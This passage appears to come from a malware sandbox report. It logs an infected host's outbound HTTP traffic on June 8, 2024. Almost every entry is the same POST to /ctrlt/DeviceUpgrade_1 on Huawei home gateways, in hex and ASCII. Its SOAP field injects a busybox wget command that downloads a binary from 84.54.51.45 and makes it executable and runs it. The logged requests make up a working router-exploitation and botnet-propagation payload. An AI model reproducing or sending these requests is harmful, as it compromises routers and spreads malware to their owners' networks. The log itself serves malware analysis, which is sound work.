2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1596192.168.2.153380041.142.217.19837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109072924 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1597192.168.2.153910241.28.102.19637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109074116 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1598192.168.2.154059041.162.169.11337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109080076 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1599192.168.2.156070241.105.63.037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109126091 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1600192.168.2.154434041.127.45.15337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109159946 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1601192.168.2.155231841.208.237.8737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109159946 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1602192.168.2.154097641.172.227.25537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109162092 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1603192.168.2.155504241.231.74.21237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109178066 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1604192.168.2.154522641.147.138.837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109178066 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1605192.168.2.154843241.75.16.24237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109178066 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1606192.168.2.153565841.122.252.12437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109224081 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
